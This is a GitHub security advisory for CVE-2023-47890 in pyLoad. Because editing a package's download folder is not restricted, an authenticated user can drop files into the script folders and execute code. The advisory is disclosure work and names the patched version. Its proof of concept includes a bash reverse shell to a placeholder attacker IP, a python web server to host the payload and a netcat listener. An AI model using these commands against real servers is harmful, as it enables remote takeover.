Skip to content

Download to arbitrary folder can lead to RCE

High severity GitHub Reviewed Published Nov 21, 2023 in pyload/pyload • Updated Jan 8, 2024

Package

pip pyload-ng (pip)

Affected versions

< 0.5.0b3.dev75

Patched versions

0.5.0b3.dev75

Description

Summary

A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.

Details

When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads.

src/pyload/core/api/init.py::add_package::L432

  folder = (
      folder.replace("http://", "")
      .replace("https://", "")
      .replace(":", "")
      .replace("/", "_")
      .replace("\\", "_")
  )

So if a package were created with the name "../" the application would instead create the folder "/downloads/.._/"

However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.

src/pyload/webui/app/blueprints/json_blueprint.py::edit_package::L195

  id = int(flask.request.form["pack_id"])
  data = {
      "name": flask.request.form["pack_name"],
      "_folder": flask.request.form["pack_folder"],
      "password": flask.request.form["pack_pws"],
  }

  api.set_package_data(id, data)

Steps to reproduce

  1. Login to a pyLoad instance
  2. Go to "Queue" and create a new package with any name and a valid link
  3. Click "Edit Package" on the newly created package and set the folder as "/config/scripts/download_finished/"
  4. Restart the package
  5. Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/download_finished/"

Remote code execution proof-of-concept

It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.

On attacker machine

  1. Start a web server hosting a malicious script
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1
sudo python3 -m http.server 80
  1. Start netcat listener for reverse shells
nc -vklp 9999

On pyLoad

  1. Change pyLoad file permission settings

    Change permissions of downloads: On
    Permission mode for downloaded files: 0744

  2. Create a package with link pointing to the attacker

    http://<attacker_ip>/evil.sh

  3. Edit package and change folder to /config/scripts/package_deleted/

  4. Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad

  5. Delete any package package to trigger the script

Impact

An authenticated user can gain control over the underlying pyLoad server.

References

@GammaC0de GammaC0de published to pyload/pyload Nov 21, 2023
Published to the GitHub Advisory Database Nov 21, 2023
Reviewed Nov 21, 2023
Published by the National Vulnerability Database Jan 8, 2024
Last updated Jan 8, 2024

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Adjacent
Attack complexity
High
Privileges required
High
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

EPSS score

0.053%
(22nd percentile)

Weaknesses

CVE ID

CVE-2023-47890

GHSA ID

GHSA-h73m-pcfw-25h2

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.